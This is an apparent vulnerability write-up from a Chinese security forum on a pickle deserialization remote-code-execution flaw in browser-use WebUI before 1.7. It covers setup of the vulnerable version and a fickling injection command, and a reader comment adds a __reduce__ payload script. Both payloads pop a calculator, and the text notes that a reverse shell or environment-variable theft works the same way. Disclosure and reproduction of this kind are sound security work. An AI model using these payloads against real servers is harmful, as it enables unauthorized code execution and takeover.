奇安信攻防社区-【热点】browser-use WebUI pickle 反序列化漏洞分析与复现

【热点】browser-use WebUI pickle 反序列化漏洞分析与复现

browser-use WebUI是基于browser-use的AI Agent应用，存在一个pickle反序列化漏洞，未经授权的远程攻击者可以利用该接口发送恶意的序列化数据，实现在服务端执行任意代码，导致服务器失陷。

一、漏洞简介
======

browser-use WebUI是基于browser-use的AI Agent应用。upload存在一个pickle反序列化漏洞，未经授权的远程攻击者可以利用该接口发送恶意的序列化数据，实现在服务端执行任意代码，导致服务器失陷。

二、影响版本
======

小于 1.7 版本。

在1.7 版本中已经修复。

三、漏洞原理分析
========

web-ui 有个功能叫 `Load Configuration`，可以让用户上传 `.pkl` 配置文件。

但是，它上传后，直接用 `pickle.load()` 反序列化了，没有做任何检查：

![1.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/04/attach-ed7bcb569244c2f31af86af82c110c8e198d89eb.png)

四、环境搭建
======

条件：python11及以上版本

新建一个目录：WebUI

在这个目录中打开cmd，克隆仓库：`git clone <https://github.com/browser-use/web-ui.git`&gt; 进入安装目录：`cd web-ui`

切换到1.4版本：`git checkout v1.4`

一定要切换版本，最新版已经修复了，在webui的目录下执行命令：`git describe --tags` 这个命令会输出你当前所在的 版本 tag（如果在 tag 上），或显示你基于哪个 tag 派生出来的。

![2.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/04/attach-c6c13d0b8e18ff4b0bc4375d84709fd43c6e8def.png)

官方建议使用 uv 来管理 Python 环境。

安装 uv：`pip install uv`

使用 uv：`uv venv --python 3.11`

激活虚拟环境：`.venv\\Scripts\\activate`

![3.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/04/attach-5e8664a96b16a17e2d156e56b6b5880f9272410e.png)

在安装依赖前需要做一些改动。按照直接 clone 下来的 requirements ，最后启动的时候会一直报错错：`TypeError: argument of type 'bool' is not iterable`

反复试了很多次，最后自己摸索出来的解决办法是修改 requirements.txt 文件，将 gradio 的版本改为 5.23.1：`gradio==5.23.1`

（在虚拟环境中）安装python依赖：`uv pip install -r requirements.txt`

在 Windows 的 cmd 命令行中，进入 Python 虚拟环境后的标志通常是在命令行提示符前面看到虚拟环境的名称。前面的 `(web-ui)` 表示你当前已经激活了名为 `web-ui` 的虚拟环境（名称取决于你创建虚拟环境时使用的名字），后是你当前所在的目录路径：

![4.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/04/attach-a9695c63e506b4862d21e93ee20533a0269f33d4.png)

安装浏览器运行环境：`playwright install`

（在虚拟环境中）配置环境：`copy .env.example .env`

配置文件 `.env` ，可以在里面修改浏览器的地址，设置各种 api 等。

（在虚拟环境中）启用 WebUI：`python webui.py --ip 192.168.119.1 --port 7788`

五、漏洞复现
======

1. 生成常规的 pickle 配置文件
--------------------

先构建一个常规的 pickle 配置文件：

构建的脚本如下，保存成 `webui.py` ：

```python
import pickle
import uuid
import os
def default_config():
    """Prepare the default configuration"""
    return {
        "agent_type": "custom",
        "max_steps": 100,
        "max_actions_per_step": 10,
        "use_vision": True,
        "tool_calling_method": "auto",
        "llm_provider": "openai",
        "llm_model_name": "gpt-4o",
        "llm_temperature": 1.0,
        "llm_base_url": "",
        "llm_api_key": "",
        "use_own_browser": os.getenv("CHROME_PERSISTENT_SESSION", "false").lower() == "true",
        "keep_browser_open": False,
        "headless": False,
        "disable_security": True,
        "enable_recording": True,
        "window_w": 1280,
        "window_h": 1100,
        "save_recording_path": "./tmp/record_videos",
        "save_trace_path": "./tmp/traces",
        "save_agent_history_path": "./tmp/agent_history",
        "task": "go to google.com and type 'OpenAI' click search and give me the first url",
    }
def load_config_from_file(config_file):
    """Load settings from a UUID.pkl file."""
    try:
        with open(config_file, 'rb') as f:
            settings = pickle.load(f)
        return settings
    except Exception as e:
        return f"Error loading configuration: {str(e)}"
def save_config_to_file(settings, save_dir="./tmp/webui_settings", name=None):
    """Save the current settings to a UUID.pkl file with a UUID name."""
    os.makedirs(save_dir, exist_ok=True)
    outname = f"{uuid.uuid4()}.pkl"
    if name is not None:
        outname = name
    config_file = os.path.join(save_dir, outname)
    with open(config_file, 'wb') as f:
        pickle.dump(settings, f)
    return f"Configuration saved to {config_file}"
def update_ui_from_config(loaded_config):
    if isinstance(loaded_config, dict):
        print("load success")
        return loaded_config.get("agent_type", "custom")
    else:
        pass
        print("not a dict object")
    return "foobar"
if __name__ == "__main__":
    save_config_to_file(default_config(), save_dir=".", name="default.pkl")
```

执行 python 文件：`python3 webui.py`

在当前目录下会生成一个文件 default.pkl ，这一步的作用是 用 web-ui 自带的脚本生成一个正常的 `.pkl` 文件，这样就不用自己去研究 web-ui 要求什么结构的 pkl 文件，直接用它原来的正常的结构来生成。所以，default.pkl 是一个正常的，干净的配置文件。

2. 使用 fickling 注入恶意代码
---------------------

需要先安装工具 `fickling` 。Linux 和 Windows 都可以安装：`uv tool install git+https://github.com/trailofbits/fickling`

```python
D:\\WebUI\\web-ui>uv tool install git+https://github.com/trailofbits/fickling
    Updated <https://github.com/trailofbits/fickling> (18d4b93d033925fce1ee1ced81e76386b515aade)
Resolved 5 packages in 1.35s
      Built fickling @ git+https://github.com/trailofbits/fickling@18d4b93d033925fce1ee1ced81e76386b515aade
Prepared 5 packages in 903ms
Installed 5 packages in 29ms
 + astunparse==1.6.3
 + fickling==0.1.3 (from git+https://github.com/trailofbits/fickling@18d4b93d033925fce1ee1ced81e76386b515aade)
 + six==1.17.0
 + stdlib-list==0.10.0
 + wheel==0.45.1
Installed 1 executable: fickling.exe
warning: C:\\Users\\你的username\\.local\\bin is not on your PATH. To use installed tools, run set PATH="C:\\\\Users\\\\你的username\\\\.local\\\\bin;%PATH%" or uv tool update-shell.
```

最后一行有个 warning，这个警告的意思是，安装的可执行文件 `fickling.exe` 被放置在 `C:\\Users\\你的username\\.local\\bin` 目录下，但是该目录没有添加到系统的 `PATH` 环境变量中。为了能够直接在命令行中使用 `fickling` 命令，你需要将这个路径添加到你的 `PATH` 环境变量。这里有三种思路：

1. 临时设置环境变量，关闭当前 cmd 窗口后就会失效： 
    1. 方法一：在当前的 cmd 窗口中执行 warning 中提示的命令：`set PATH="C:\\\\Users\\\\你的username\\\\.local\\\\bin;%PATH%"`
    2. 方法二：使用 uv 命令自动更新 shell 环境，这会自动将相关目录添加到 `PATH` 中，便于使用，在当前的 cmd 窗口中执行 warning 中提示的命令：`uv tool update-shell`
2. 永久添加环境变量： 
    1. 常规的，在系统变量的 Path 中添加这个目录即可。

安装好以后就可以用这个工具将恶意代码注入到 pickle 文件中，比如注入一个简单的 弹计算器命令（Linux/macOS 是 gnome-calculator，Windows 是 calc.exe），或者弹反弹shell。我这里环境搭建在 windows 中，所以是 `calc.exe` 。

注入命令：`fickling --inject "os.system('start calc.exe')" default.pkl > malicious.pkl`

这里也可以换成其他命令，比如反弹 shell，或者上传环境变量等等。

执行完之后，就会生成一个恶意的 pickle 文件 `malicious.pkl` 。

3. 启用本地 WebUI 服务
----------------

在虚拟环境中 启用 WebUI：`python webui.py --ip 192.168.119.1 --port 7788`

这样就算是启用成功了：

![5.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/04/attach-20a26459b2d18e8d80a0fce148845e97d8920876.png)

4. 上传恶意 malicious.pkl 文件
------------------------

在浏览器中访问：[](http://192.168.119.1:7788/)<http://192.168.119.1:7788>：

![6.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/04/attach-c6f5c67af82456eda8cd8072ef9e13d6b460aeb1.png)

找到 Configuration 功能（配置文件导入/上传按钮），上传你刚刚生成的 `malicious.pkl` 文件，上传以后点击 Load Existing Config From File，即可触发反序列化漏洞，弹出计算器：

![7.png](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2025/04/attach-7fb291c5d6064e38fb235e528c04aaf325422191.png)

六、修复建议
======

升级到 1.7 版本。

发表于 2025-05-06 16:25:45
阅读 ( 2193 )
分类：Web应用

1 条评论

ph0ebus 1秒前

不用fickling也可以，直接用pickle序列化生成 import pickle import os class Test(object): def __reduce__(self): return (os.system,('calc',)) payload = pickle.dumps(Test(), protocol=0) open('exp.pkl',"wb").write(payload)